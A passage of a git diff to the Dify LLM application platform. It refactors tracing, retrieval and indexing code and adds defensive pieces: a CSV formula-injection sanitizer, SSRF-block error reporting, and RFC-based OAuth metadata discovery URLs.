- def validate_json_schema(cls, schema: dict[str, Any] | None) -> dict[str, Any] | None: + def validate_json_schema(cls, schema: str | None) -> str | None: if schema is None: return None + try: - Draft7Validator.check_schema(schema) + json_schema = json.loads(schema) + except json.JSONDecodeError: + raise ValueError(f"invalid json_schema value {schema}") + + try: + Draft7Validator.check_schema(json_schema) except SchemaError as e: raise ValueError(f"Invalid JSON schema: {e.message}") return schema diff --git a/api/core/app/apps/advanced_chat/generate_task_pipeline.py b/api/core/app/apps/advanced_chat/generate_task_pipeline.py index b297f3ff20..da1e9f19b6 100644 --- a/api/core/app/apps/advanced_chat/generate_task_pipeline.py +++ b/api/core/app/apps/advanced_chat/generate_task_pipeline.py @@ -62,8 +62,7 @@ from core.app.task_pipeline.message_cycle_manager import MessageCycleManager from core.base.tts import AppGeneratorTTSPublisher, AudioTrunk from core.model_runtime.entities.llm_entities import LLMUsage from core.model_runtime.utils.encoders import jsonable_encoder -from core.ops.entities.trace_entity import TraceTaskName -from core.ops.ops_trace_manager import TraceQueueManager, TraceTask +from core.ops.ops_trace_manager import TraceQueueManager from core.workflow.enums import WorkflowExecutionStatus from core.workflow.nodes import NodeType from core.workflow.repositories.draft_variable_repository import DraftVariableSaverFactory @@ -73,7 +72,7 @@ from extensions.ext_database import db from libs.datetime_utils import naive_utc_now from models import Account, Conversation, EndUser, Message, MessageFile from models.enums import CreatorUserRole -from models.workflow import Workflow, WorkflowNodeExecutionModel +from models.workflow import Workflow logger = logging.getLogger(__name__) @@ -581,7 +580,7 @@ class AdvancedChatAppGenerateTaskPipeline(GraphRuntimeStateSupport): with self._database_session() as session: # Save message - self._save_message(session=session, graph_runtime_state=resolved_state, trace_manager=trace_manager) + self._save_message(session=session, graph_runtime_state=resolved_state) yield workflow_finish_resp elif event.stopped_by in ( @@ -591,7 +590,7 @@ class AdvancedChatAppGenerateTaskPipeline(GraphRuntimeStateSupport): # When hitting input-moderation or annotation-reply, the workflow will not start with self._database_session() as session: # Save message - self._save_message(session=session, trace_manager=trace_manager) + self._save_message(session=session) yield self._message_end_to_stream_response() @@ -600,7 +599,6 @@ class AdvancedChatAppGenerateTaskPipeline(GraphRuntimeStateSupport): event: QueueAdvancedChatMessageEndEvent, *, graph_runtime_state: GraphRuntimeState | None = None, - trace_manager: TraceQueueManager | None = None, **kwargs, ) -> Generator[StreamResponse, None, None]: """Handle advanced chat message end events.""" @@ -618,7 +616,7 @@ class AdvancedChatAppGenerateTaskPipeline(GraphRuntimeStateSupport): # Save message with self._database_session() as session: - self._save_message(session=session, graph_runtime_state=resolved_state, trace_manager=trace_manager) + self._save_message(session=session, graph_runtime_state=resolved_state) yield self._message_end_to_stream_response() @@ -772,13 +770,7 @@ class AdvancedChatAppGenerateTaskPipeline(GraphRuntimeStateSupport): if self._conversation_name_generate_thread: logger.debug("Conversation name generation running as daemon thread") - def _save_message( - self, - *, - session: Session, - graph_runtime_state: GraphRuntimeState | None = None, - trace_manager: TraceQueueManager | None = None, - ): + def _save_message(self, *, session: Session, graph_runtime_state: GraphRuntimeState | None = None): message = self._get_message(session=session) # If there are assistant files, remove markdown image links from answer @@ -817,14 +809,6 @@ class AdvancedChatAppGenerateTaskPipeline(GraphRuntimeStateSupport): metadata = self._task_state.metadata.model_dump() message.message_metadata = json.dumps(jsonable_encoder(metadata)) - - # Extract model provider and model_id from workflow node executions for tracing - if message.workflow_run_id: - model_info = self._extract_model_info_from_workflow(session, message.workflow_run_id) - if model_info: - message.model_provider = model_info.get("provider") - message.model_id = model_info.get("model") - message_files = [ MessageFile( message_id=message.id, @@ -842,68 +826,6 @@ class AdvancedChatAppGenerateTaskPipeline(GraphRuntimeStateSupport): ] session.add_all(message_files) - # Trigger MESSAGE_TRACE for tracing integrations - if trace_manager: - trace_manager.add_trace_task( - TraceTask( - TraceTaskName.MESSAGE_TRACE, conversation_id=self._conversation_id, message_id=self._message_id - ) - ) - - def _extract_model_info_from_workflow(self, session: Session, workflow_run_id: str) -> dict[str, str] | None: - """ - Extract model provider and model_id from workflow node executions. - Returns dict with 'provider' and 'model' keys, or None if not found. - """ - try: - # Query workflow node executions for LLM or Agent nodes - stmt = ( - select(WorkflowNodeExecutionModel) - .where(WorkflowNodeExecutionModel.workflow_run_id == workflow_run_id) - .where(WorkflowNodeExecutionModel.node_type.in_(["llm", "agent"])) - .order_by(WorkflowNodeExecutionModel.created_at.desc()) - .limit(1) - ) - node_execution = session.scalar(stmt) - - if not node_execution: - return None - - # Try to extract from execution_metadata for agent nodes - if node_execution.execution_metadata: - try: - metadata = json.loads(node_execution.execution_metadata) - agent_log = metadata.get("agent_log", []) - # Look for the first agent thought with provider info - for log_entry in agent_log: - entry_metadata = log_entry.get("metadata", {}) - provider_str = entry_metadata.get("provider") - if provider_str: - # Parse format like "langgenius/deepseek/deepseek" - parts = provider_str.split("/") - if len(parts) >= 3: - return {"provider": parts[1], "model": parts[2]} - elif len(parts) == 2: - return {"provider": parts[0], "model": parts[1]} - except (json.JSONDecodeError, KeyError, AttributeError) as e: - logger.debug("Failed to parse execution_metadata: %s", e) - - # Try to extract from process_data for llm nodes - if node_execution.process_data: - try: - process_data = json.loads(node_execution.process_data) - provider = process_data.get("model_provider") - model = process_data.get("model_name") - if provider and model: - return {"provider": provider, "model": model} - except (json.JSONDecodeError, KeyError) as e: - logger.debug("Failed to parse process_data: %s", e) - - return None - except Exception as e: - logger.warning("Failed to extract model info from workflow: %s", e) - return None - def _seed_graph_runtime_state_from_queue_manager(self) -> None: """Bootstrap the cached runtime state from the queue manager when present.""" candidate = self._base_task_pipeline.queue_manager.graph_runtime_state diff --git a/api/core/app/apps/base_app_generator.py b/api/core/app/apps/base_app_generator.py index 1b0474142e..02d58a07d1 100644 --- a/api/core/app/apps/base_app_generator.py +++ b/api/core/app/apps/base_app_generator.py @@ -1,3 +1,4 @@ +import json from collections.abc import Generator, Mapping, Sequence from typing import TYPE_CHECKING, Any, Union, final @@ -175,6 +176,13 @@ class BaseAppGenerator: value = True elif value == 0: value = False + case VariableEntityType.JSON_OBJECT: + if not isinstance(value, str): + raise ValueError(f"{variable_entity.variable} in input form must be a string") + try: + json.loads(value) + except json.JSONDecodeError: + raise ValueError(f"{variable_entity.variable} in input form must be a valid JSON object") case _: raise AssertionError("this statement should be unreachable.") diff --git a/api/core/app/apps/base_app_runner.py b/api/core/app/apps/base_app_runner.py index 9a9832dd4a..e2e6c11480 100644 --- a/api/core/app/apps/base_app_runner.py +++ b/api/core/app/apps/base_app_runner.py @@ -83,6 +83,7 @@ class AppRunner: context: str | None = None, memory: TokenBufferMemory | None = None, image_detail_config: ImagePromptMessageContent.DETAIL | None = None, + context_files: list["File"] | None = None, ) -> tuple[list[PromptMessage], list[str] | None]: """ Organize prompt messages @@ -111,6 +112,7 @@ class AppRunner: memory=memory, model_config=model_config, image_detail_config=image_detail_config, + context_files=context_files, ) else: memory_config = MemoryConfig(window=MemoryConfig.WindowConfig(enabled=False)) diff --git a/api/core/app/apps/chat/app_runner.py b/api/core/app/apps/chat/app_runner.py index 53188cf506..f8338b226b 100644 --- a/api/core/app/apps/chat/app_runner.py +++ b/api/core/app/apps/chat/app_runner.py @@ -11,6 +11,7 @@ from core.app.entities.app_invoke_entities import ( ) from core.app.entities.queue_entities import QueueAnnotationReplyEvent from core.callback_handler.index_tool_callback_handler import DatasetIndexToolCallbackHandler +from core.file import File from core.memory.token_buffer_memory import TokenBufferMemory from core.model_manager import ModelInstance from core.model_runtime.entities.message_entities import ImagePromptMessageContent @@ -146,6 +147,7 @@ class ChatAppRunner(AppRunner): # get context from datasets context = None + context_files: list[File] = [] if app_config.dataset and app_config.dataset.dataset_ids: hit_callback = DatasetIndexToolCallbackHandler( queue_manager, @@ -156,7 +158,7 @@ class ChatAppRunner(AppRunner): ) dataset_retrieval = DatasetRetrieval(application_generate_entity) - context = dataset_retrieval.retrieve( + context, retrieved_files = dataset_retrieval.retrieve( app_id=app_record.id, user_id=application_generate_entity.user_id, tenant_id=app_record.tenant_id, @@ -171,7 +173,11 @@ class ChatAppRunner(AppRunner): memory=memory, message_id=message.id, inputs=inputs, + vision_enabled=application_generate_entity.app_config.app_model_config_dict.get("file_upload", {}).get( + "enabled", False + ), ) + context_files = retrieved_files or [] # reorganize all inputs and template to prompt messages # Include: prompt template, inputs, query(optional), files(optional) @@ -186,6 +192,7 @@ class ChatAppRunner(AppRunner): context=context, memory=memory, image_detail_config=image_detail_config, + context_files=context_files, ) # check hosting moderation diff --git a/api/core/app/apps/completion/app_runner.py b/api/core/app/apps/completion/app_runner.py index e2be4146e1..ddfb5725b4 100644 --- a/api/core/app/apps/completion/app_runner.py +++ b/api/core/app/apps/completion/app_runner.py @@ -10,6 +10,7 @@ from core.app.entities.app_invoke_entities import ( CompletionAppGenerateEntity, ) from core.callback_handler.index_tool_callback_handler import DatasetIndexToolCallbackHandler +from core.file import File from core.model_manager import ModelInstance from core.model_runtime.entities.message_entities import ImagePromptMessageContent from core.moderation.base import ModerationError @@ -102,6 +103,7 @@ class CompletionAppRunner(AppRunner): # get context from datasets context = None + context_files: list[File] = [] if app_config.dataset and app_config.dataset.dataset_ids: hit_callback = DatasetIndexToolCallbackHandler( queue_manager, @@ -116,7 +118,7 @@ class CompletionAppRunner(AppRunner): query = inputs.get(dataset_config.retrieve_config.query_variable, "") dataset_retrieval = DatasetRetrieval(application_generate_entity) - context = dataset_retrieval.retrieve( + context, retrieved_files = dataset_retrieval.retrieve( app_id=app_record.id, user_id=application_generate_entity.user_id, tenant_id=app_record.tenant_id, @@ -130,7 +132,11 @@ class CompletionAppRunner(AppRunner): hit_callback=hit_callback, message_id=message.id, inputs=inputs, + vision_enabled=application_generate_entity.app_config.app_model_config_dict.get("file_upload", {}).get( + "enabled", False + ), ) + context_files = retrieved_files or [] # reorganize all inputs and template to prompt messages # Include: prompt template, inputs, query(optional), files(optional) @@ -144,6 +150,7 @@ class CompletionAppRunner(AppRunner): query=query, context=context, image_detail_config=image_detail_config, + context_files=context_files, ) # check hosting moderation diff --git a/api/core/app/entities/task_entities.py b/api/core/app/entities/task_entities.py index 7692128985..79a5e657b3 100644 --- a/api/core/app/entities/task_entities.py +++ b/api/core/app/entities/task_entities.py @@ -40,9 +40,6 @@ class EasyUITaskState(TaskState): """ llm_result: LLMResult - first_token_time: float | None = None - last_token_time: float | None = None - is_streaming_response: bool = False class WorkflowTaskState(TaskState): diff --git a/api/core/app/task_pipeline/easy_ui_based_generate_task_pipeline.py b/api/core/app/task_pipeline/easy_ui_based_generate_task_pipeline.py index 98548ddfbb..5bb93fa44a 100644 --- a/api/core/app/task_pipeline/easy_ui_based_generate_task_pipeline.py +++ b/api/core/app/task_pipeline/easy_ui_based_generate_task_pipeline.py @@ -332,12 +332,6 @@ class EasyUIBasedGenerateTaskPipeline(BasedGenerateTaskPipeline): if not self._task_state.llm_result.prompt_messages: self._task_state.llm_result.prompt_messages = chunk.prompt_messages - # Track streaming response times - if self._task_state.first_token_time is None: - self._task_state.first_token_time = time.perf_counter() - self._task_state.is_streaming_response = True - self._task_state.last_token_time = time.perf_counter() - # handle output moderation chunk should_direct_answer = self._handle_output_moderation_chunk(cast(str, delta_text)) if should_direct_answer: @@ -348,9 +342,11 @@ class EasyUIBasedGenerateTaskPipeline(BasedGenerateTaskPipeline): self._task_state.llm_result.message.content = current_content if isinstance(event, QueueLLMChunkEvent): + event_type = self._message_cycle_manager.get_message_event_type(message_id=self._message_id) yield self._message_cycle_manager.message_to_stream_response( answer=cast(str, delta_text), message_id=self._message_id, + event_type=event_type, ) else: yield self._agent_message_to_stream_response( @@ -404,18 +400,6 @@ class EasyUIBasedGenerateTaskPipeline(BasedGenerateTaskPipeline): message.total_price = usage.total_price message.currency = usage.currency self._task_state.llm_result.usage.latency = message.provider_response_latency - - # Add streaming metrics to usage if available - if self._task_state.is_streaming_response and self._task_state.first_token_time: - start_time = self.start_at - first_token_time = self._task_state.first_token_time - last_token_time = self._task_state.last_token_time or first_token_time - usage.time_to_first_token = round(first_token_time - start_time, 3) - usage.time_to_generate = round(last_token_time - first_token_time, 3) - - # Update metadata with the complete usage info - self._task_state.metadata.usage = usage - message.message_metadata = self._task_state.metadata.model_dump_json() if trace_manager: diff --git a/api/core/app/task_pipeline/message_cycle_manager.py b/api/core/app/task_pipeline/message_cycle_manager.py index 2e6f92efa5..0e7f300cee 100644 --- a/api/core/app/task_pipeline/message_cycle_manager.py +++ b/api/core/app/task_pipeline/message_cycle_manager.py @@ -5,7 +5,7 @@ from threading import Thread from typing import Union from flask import Flask, current_app -from sqlalchemy import select +from sqlalchemy import exists, select from sqlalchemy.orm import Session from configs import dify_config @@ -54,6 +54,20 @@ class MessageCycleManager: ): self._application_generate_entity = application_generate_entity self._task_state = task_state + self._message_has_file: set[str] = set() + + def get_message_event_type(self, message_id: str) -> StreamEvent: + if message_id in self._message_has_file: + return StreamEvent.MESSAGE_FILE + + with Session(db.engine, expire_on_commit=False) as session: + has_file = session.query(exists().where(MessageFile.message_id == message_id)).scalar() + + if has_file: + self._message_has_file.add(message_id) + return StreamEvent.MESSAGE_FILE + + return StreamEvent.MESSAGE def generate_conversation_name(self, *, conversation_id: str, query: str) -> Thread | None: """ @@ -214,7 +228,11 @@ class MessageCycleManager: return None def message_to_stream_response( - self, answer: str, message_id: str, from_variable_selector: list[str] | None = None + self, + answer: str, + message_id: str, + from_variable_selector: list[str] | None = None, + event_type: StreamEvent | None = None, ) -> MessageStreamResponse: """ Message to stream response. @@ -222,16 +240,12 @@ class MessageCycleManager: :param message_id: message id :return: """ - with Session(db.engine, expire_on_commit=False) as session: - message_file = session.scalar(select(MessageFile).where(MessageFile.id == message_id)) - event_type = StreamEvent.MESSAGE_FILE if message_file else StreamEvent.MESSAGE - return MessageStreamResponse( task_id=self._application_generate_entity.task_id, id=message_id, answer=answer, from_variable_selector=from_variable_selector, - event=event_type, + event=event_type or StreamEvent.MESSAGE, ) def message_replace_to_stream_response(self, answer: str, reason: str = "") -> MessageReplaceStreamResponse: diff --git a/api/core/callback_handler/index_tool_callback_handler.py b/api/core/callback_handler/index_tool_callback_handler.py index 14d5f38dcd..d0279349ca 100644 --- a/api/core/callback_handler/index_tool_callback_handler.py +++ b/api/core/callback_handler/index_tool_callback_handler.py @@ -7,7 +7,7 @@ from core.app.apps.base_app_queue_manager import AppQueueManager, PublishFrom from core.app.entities.app_invoke_entities import InvokeFrom from core.app.entities.queue_entities import QueueRetrieverResourcesEvent from core.rag.entities.citation_metadata import RetrievalSourceMetadata -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.models.document import Document from extensions.ext_database import db from models.dataset import ChildChunk, DatasetQuery, DocumentSegment @@ -59,7 +59,7 @@ class DatasetIndexToolCallbackHandler: document_id, ) continue - if dataset_document.doc_form == IndexType.PARENT_CHILD_INDEX: + if dataset_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: child_chunk_stmt = select(ChildChunk).where( ChildChunk.index_node_id == document.metadata["doc_id"], ChildChunk.dataset_id == dataset_document.dataset_id, diff --git a/sdks/python-client/tests/__init__.py b/api/core/db/__init__.py similarity index 100% rename from sdks/python-client/tests/__init__.py rename to api/core/db/__init__.py diff --git a/api/core/db/session_factory.py b/api/core/db/session_factory.py new file mode 100644 index 0000000000..1dae2eafd4 --- /dev/null +++ b/api/core/db/session_factory.py @@ -0,0 +1,38 @@ +from sqlalchemy import Engine +from sqlalchemy.orm import Session, sessionmaker + +_session_maker: sessionmaker | None = None + + +def configure_session_factory(engine: Engine, expire_on_commit: bool = False): + """Configure the global session factory""" + global _session_maker + _session_maker = sessionmaker(bind=engine, expire_on_commit=expire_on_commit) + + +def get_session_maker() -> sessionmaker: + if _session_maker is None: + raise RuntimeError("Session factory not configured. Call configure_session_factory() first.") + return _session_maker + + +def create_session() -> Session: + return get_session_maker()() + + +# Class wrapper for convenience +class SessionFactory: + @staticmethod + def configure(engine: Engine, expire_on_commit: bool = False): + configure_session_factory(engine, expire_on_commit) + + @staticmethod + def get_session_maker() -> sessionmaker: + return get_session_maker() + + @staticmethod + def create_session() -> Session: + return create_session() + + +session_factory = SessionFactory() diff --git a/api/core/entities/knowledge_entities.py b/api/core/entities/knowledge_entities.py index b9ca7414dc..d4093b5245 100644 --- a/api/core/entities/knowledge_entities.py +++ b/api/core/entities/knowledge_entities.py @@ -1,4 +1,4 @@ -from pydantic import BaseModel +from pydantic import BaseModel, Field, field_validator class PreviewDetail(BaseModel): @@ -20,9 +20,17 @@ class IndexingEstimate(BaseModel): class PipelineDataset(BaseModel): id: str name: str - description: str + description: str = Field(default="", description="knowledge dataset description") chunk_structure: str + @field_validator("description", mode="before") + @classmethod + def normalize_description(cls, value: str | None) -> str: + """Coerce None to empty string so description is always a string.""" + if value is None: + return "" + return value + class PipelineDocument(BaseModel): id: str diff --git a/api/core/entities/mcp_provider.py b/api/core/entities/mcp_provider.py index 7484cea04a..7fdf5e4be6 100644 --- a/api/core/entities/mcp_provider.py +++ b/api/core/entities/mcp_provider.py @@ -213,12 +213,23 @@ class MCPProviderEntity(BaseModel): return None def retrieve_tokens(self) -> OAuthTokens | None: - """OAuth tokens if available""" + """Retrieve OAuth tokens if authentication is complete. + + Returns: + OAuthTokens if the provider has been authenticated, None otherwise. + """ if not self.credentials: return None credentials = self.decrypt_credentials() + access_token = credentials.get("access_token", "") + # Return None if access_token is empty to avoid generating invalid "Authorization: Bearer " header. + # Note: We don't check for whitespace-only strings here because: + # 1. OAuth servers don't return whitespace-only access tokens in practice + # 2. Even if they did, the server would return 401, triggering the OAuth flow correctly + if not access_token: + return None return OAuthTokens( - access_token=credentials.get("access_token", ""), + access_token=access_token, token_type=credentials.get("token_type", DEFAULT_TOKEN_TYPE), expires_in=int(credentials.get("expires_in", str(DEFAULT_EXPIRES_IN)) or DEFAULT_EXPIRES_IN), refresh_token=credentials.get("refresh_token", ""), diff --git a/api/core/helper/csv_sanitizer.py b/api/core/helper/csv_sanitizer.py new file mode 100644 index 0000000000..0023de5a35 --- /dev/null +++ b/api/core/helper/csv_sanitizer.py @@ -0,0 +1,89 @@ +"""CSV sanitization utilities to prevent formula injection attacks.""" + +from typing import Any + + +class CSVSanitizer: + """ + Sanitizer for CSV export to prevent formula injection attacks. + + This class provides methods to sanitize data before CSV export by escaping + characters that could be interpreted as formulas by spreadsheet applications + (Excel, LibreOffice, Google Sheets). + + Formula injection occurs when user-controlled data starting with special + characters (=, +, -, @, tab, carriage return) is exported to CSV and opened + in a spreadsheet application, potentially executing malicious commands. + """ + + # Characters that can start a formula in Excel/LibreOffice/Google Sheets + FORMULA_CHARS = frozenset({"=", "+", "-", "@", "\t", "\r"}) + + @classmethod + def sanitize_value(cls, value: Any) -> str: + """ + Sanitize a value for safe CSV export. + + Prefixes formula-initiating characters with a single quote to prevent + Excel/LibreOffice/Google Sheets from treating them as formulas. + + Args: + value: The value to sanitize (will be converted to string) + + Returns: + Sanitized string safe for CSV export + + Examples: + >>> CSVSanitizer.sanitize_value("=1+1") + "'=1+1" + >>> CSVSanitizer.sanitize_value("Hello World") + "Hello World" + >>> CSVSanitizer.sanitize_value(None) + "" + """ + if value is None: + return "" + + # Convert to string + str_value = str(value) + + # If empty, return as is + if not str_value: + return "" + + # Check if first character is a formula initiator + if str_value[0] in cls.FORMULA_CHARS: + # Prefix with single quote to escape + return f"'{str_value}" + + return str_value + + @classmethod + def sanitize_dict(cls, data: dict[str, Any], fields_to_sanitize: list[str] | None = None) -> dict[str, Any]: + """ + Sanitize specified fields in a dictionary. + + Args: + data: Dictionary containing data to sanitize + fields_to_sanitize: List of field names to sanitize. + If None, sanitizes all string fields. + + Returns: + Dictionary with sanitized values (creates a shallow copy) + + Examples: + >>> data = {"question": "=1+1", "answer": "+calc", "id": "123"} + >>> CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + {"question": "'=1+1", "answer": "'+calc", "id": "123"} + """ + sanitized = data.copy() + + if fields_to_sanitize is None: + # Sanitize all string fields + fields_to_sanitize = [k for k, v in data.items() if isinstance(v, str)] + + for field in fields_to_sanitize: + if field in sanitized: + sanitized[field] = cls.sanitize_value(sanitized[field]) + + return sanitized diff --git a/api/core/helper/ssrf_proxy.py b/api/core/helper/ssrf_proxy.py index 0de026f3c7..6c98aea1be 100644 --- a/api/core/helper/ssrf_proxy.py +++ b/api/core/helper/ssrf_proxy.py @@ -9,6 +9,7 @@ import httpx from configs import dify_config from core.helper.http_client_pooling import get_pooled_http_client +from core.tools.errors import ToolSSRFError logger = logging.getLogger(__name__) @@ -93,6 +94,18 @@ def make_request(method, url, max_retries=SSRF_DEFAULT_MAX_RETRIES, **kwargs): while retries <= max_retries: try: response = client.request(method=method, url=url, **kwargs) + # Check for SSRF protection by Squid proxy + if response.status_code in (401, 403): + # Check if this is a Squid SSRF rejection + server_header = response.headers.get("server", "").lower() + via_header = response.headers.get("via", "").lower() + + # Squid typically identifies itself in Server or Via headers + if "squid" in server_header or "squid" in via_header: + raise ToolSSRFError( + f"Access to '{url}' was blocked by SSRF protection. " + f"The URL may point to a private or local network address. " + ) if response.status_code not in STATUS_FORCELIST: return response diff --git a/api/core/indexing_runner.py b/api/core/indexing_runner.py index 36b38b7b45..59de4f403d 100644 --- a/api/core/indexing_runner.py +++ b/api/core/indexing_runner.py @@ -7,7 +7,7 @@ import time import uuid from typing import Any -from flask import current_app +from flask import Flask, current_app from sqlalchemy import select from sqlalchemy.orm.exc import ObjectDeletedError @@ -21,7 +21,7 @@ from core.rag.datasource.keyword.keyword_factory import Keyword from core.rag.docstore.dataset_docstore import DatasetDocumentStore from core.rag.extractor.entity.datasource_type import DatasourceType from core.rag.extractor.entity.extract_setting import ExtractSetting, NotionInfo, WebsiteInfo -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_base import BaseIndexProcessor from core.rag.index_processor.index_processor_factory import IndexProcessorFactory from core.rag.models.document import ChildDocument, Document @@ -36,6 +36,7 @@ from extensions.ext_redis import redis_client from extensions.ext_storage import storage from libs import helper from libs.datetime_utils import naive_utc_now +from models import Account from models.dataset import ChildChunk, Dataset, DatasetProcessRule, DocumentSegment from models.dataset import Document as DatasetDocument from models.model import UploadFile @@ -89,8 +90,17 @@ class IndexingRunner: text_docs = self._extract(index_processor, requeried_document, processing_rule.to_dict()) # transform + current_user = db.session.query(Account).filter_by(id=requeried_document.created_by).first() + if not current_user: + raise ValueError("no current user found") + current_user.set_tenant_id(dataset.tenant_id) documents = self._transform( - index_processor, dataset, text_docs, requeried_document.doc_language, processing_rule.to_dict() + index_processor, + dataset, + text_docs, + requeried_document.doc_language, + processing_rule.to_dict(), + current_user=current_user, ) # save segment self._load_segments(dataset, requeried_document, documents) @@ -136,7 +146,7 @@ class IndexingRunner: for document_segment in document_segments: db.session.delete(document_segment) - if requeried_document.doc_form == IndexType.PARENT_CHILD_INDEX: + if requeried_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: # delete child chunks db.session.query(ChildChunk).where(ChildChunk.segment_id == document_segment.id).delete() db.session.commit() @@ -152,8 +162,17 @@ class IndexingRunner: text_docs = self._extract(index_processor, requeried_document, processing_rule.to_dict()) # transform + current_user = db.session.query(Account).filter_by(id=requeried_document.created_by).first() + if not current_user: + raise ValueError("no current user found") + current_user.set_tenant_id(dataset.tenant_id) documents = self._transform( - index_processor, dataset, text_docs, requeried_document.doc_language, processing_rule.to_dict() + index_processor, + dataset, + text_docs, + requeried_document.doc_language, + processing_rule.to_dict(), + current_user=current_user, ) # save segment self._load_segments(dataset, requeried_document, documents) @@ -209,7 +228,7 @@ class IndexingRunner: "dataset_id": document_segment.dataset_id, }, ) - if requeried_document.doc_form == IndexType.PARENT_CHILD_INDEX: + if requeried_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: child_chunks = document_segment.get_child_chunks() if child_chunks: child_documents = [] @@ -302,6 +321,7 @@ class IndexingRunner: text_docs = index_processor.extract(extract_setting, process_rule_mode=tmp_processing_rule["mode"]) documents = index_processor.transform( text_docs, + current_user=None, embedding_model_instance=embedding_model_instance, process_rule=processing_rule.to_dict(), tenant_id=tenant_id, @@ -551,7 +571,10 @@ class IndexingRunner: indexing_start_at = time.perf_counter() tokens = 0 create_keyword_thread = None - if dataset_document.doc_form != IndexType.PARENT_CHILD_INDEX and dataset.indexing_technique == "economy": + if ( + dataset_document.doc_form != IndexStructureType.PARENT_CHILD_INDEX + and dataset.indexing_technique == "economy" + ): # create keyword index create_keyword_thread = threading.Thread( target=self._process_keyword_index, @@ -590,7 +613,7 @@ class IndexingRunner: for future in futures: tokens += future.result() if ( - dataset_document.doc_form != IndexType.PARENT_CHILD_INDEX + dataset_document.doc_form != IndexStructureType.PARENT_CHILD_INDEX and dataset.indexing_technique == "economy" and create_keyword_thread is not None ): @@ -635,7 +658,13 @@ class IndexingRunner: db.session.commit() def _process_chunk( - self, flask_app, index_processor, chunk_documents, dataset, dataset_document, embedding_model_instance + self, + flask_app: Flask, + index_processor: BaseIndexProcessor, + chunk_documents: list[Document], + dataset: Dataset, + dataset_document: DatasetDocument, + embedding_model_instance: ModelInstance | None, ): with flask_app.app_context(): # check document is paused @@ -646,8 +675,15 @@ class IndexingRunner: page_content_list = [document.page_content for document in chunk_documents] tokens += sum(embedding_model_instance.get_text_embedding_num_tokens(page_content_list)) + multimodal_documents = [] + for document in chunk_documents: + if document.attachments and dataset.is_multimodal: + multimodal_documents.extend(document.attachments) + # load index - index_processor.load(dataset, chunk_documents, with_keywords=False) + index_processor.load( + dataset, chunk_documents, multimodal_documents=multimodal_documents, with_keywords=False + ) document_ids = [document.metadata["doc_id"] for document in chunk_documents] db.session.query(DocumentSegment).where( @@ -710,6 +746,7 @@ class IndexingRunner: text_docs: list[Document], doc_language: str, process_rule: dict, + current_user: Account | None = None, ) -> list[Document]: # get embedding model instance embedding_model_instance = None @@ -729,6 +766,7 @@ class IndexingRunner: documents = index_processor.transform( text_docs, + current_user, embedding_model_instance=embedding_model_instance, process_rule=process_rule, tenant_id=dataset.tenant_id, @@ -737,14 +775,16 @@ class IndexingRunner: return documents - def _load_segments(self, dataset, dataset_document, documents): + def _load_segments(self, dataset: Dataset, dataset_document: DatasetDocument, documents: list[Document]): # save node to document segment doc_store = DatasetDocumentStore( dataset=dataset, user_id=dataset_document.created_by, document_id=dataset_document.id ) # add document segments - doc_store.add_documents(docs=documents, save_child=dataset_document.doc_form == IndexType.PARENT_CHILD_INDEX) + doc_store.add_documents( + docs=documents, save_child=dataset_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX + ) # update document status to indexing cur_time = naive_utc_now() diff --git a/api/core/mcp/auth/auth_flow.py b/api/core/mcp/auth/auth_flow.py index 92787b39dd..aef1afb235 100644 --- a/api/core/mcp/auth/auth_flow.py +++ b/api/core/mcp/auth/auth_flow.py @@ -47,7 +47,11 @@ def build_protected_resource_metadata_discovery_urls( """ Build a list of URLs to try for Protected Resource Metadata discovery. - Per SEP-985, supports fallback when discovery fails at one URL. + Per RFC 9728 Section 5.1, supports fallback when discovery fails at one URL. + Priority order: + 1. URL from WWW-Authenticate header (if provided) + 2. Well-known URI with path: https://example.com/.well-known/oauth-protected-resource/public/mcp + 3. Well-known URI at root: https://example.com/.well-known/oauth-protected-resource """ urls = [] @@ -58,9 +62,18 @@ def build_protected_resource_metadata_discovery_urls( # Fallback: construct from server URL parsed = urlparse(server_url) base_url = f"{parsed.scheme}://{parsed.netloc}" - fallback_url = urljoin(base_url, "/.well-known/oauth-protected-resource") - if fallback_url not in urls: - urls.append(fallback_url) + path = parsed.path.rstrip("/") + + # Priority 2: With path insertion (e.g., /.well-known/oauth-protected-resource/public/mcp) + if path: + path_url = f"{base_url}/.well-known/oauth-protected-resource{path}" + if path_url not in urls: + urls.append(path_url) + + # Priority 3: At root (e.g., /.well-known/oauth-protected-resource) + root_url = f"{base_url}/.well-known/oauth-protected-resource" + if root_url not in urls: + urls.append(root_url) return urls @@ -71,30 +84,34 @@ def build_oauth_authorization_server_metadata_discovery_urls(auth_server_url: st Supports both OAuth 2.0 (RFC 8414) and OpenID Connect discovery. - Per RFC 8414 section 3: - - If issuer has no path: https://example.com/.well-known/oauth-authorization-server - - If issuer has path: https://example.com/.well-known/oauth-authorization-server{path} - - Example: - - issuer: https://example.com/oauth - - metadata: https://example.com/.well-known/oauth-authorization-server/oauth + Per RFC 8414 section 3.1 and section 5, try all possible endpoints: + - OAuth 2.0 with path insertion: https://example.com/.well-known/oauth-authorization-server/tenant1 + - OpenID Connect with path insertion: https://example.com/.well-known/openid-configuration/tenant1 + - OpenID Connect path appending: https://example.com/tenant1/.well-known/openid-configuration + - OAuth 2.0 at root: https://example.com/.well-known/oauth-authorization-server + - OpenID Connect at root: https://example.com/.well-known/openid-configuration """ urls = [] base_url = auth_server_url or server_url parsed = urlparse(base_url) base = f"{parsed.scheme}://{parsed.netloc}" - path = parsed.path.rstrip("/") # Remove trailing slash + path = parsed.path.rstrip("/") + # OAuth 2.0 Authorization Server Metadata at root (MCP-03-26) + urls.append(f"{base}/.well-known/oauth-authorization-server") - # Try OpenID Connect discovery first (more common) - urls.append(urljoin(base + "/", ".well-known/openid-configuration")) + # OpenID Connect Discovery at root + urls.append(f"{base}/.well-known/openid-configuration") - # OAuth 2.0 Authorization Server Metadata (RFC 8414) - # Include the path component if present in the issuer URL if path: - urls.append(urljoin(base, f".well-known/oauth-authorization-server{path}")) - else: - urls.append(urljoin(base, ".well-known/oauth-authorization-server")) + # OpenID Connect Discovery with path insertion + urls.append(f"{base}/.well-known/openid-configuration{path}") + + # OpenID Connect Discovery path appending + 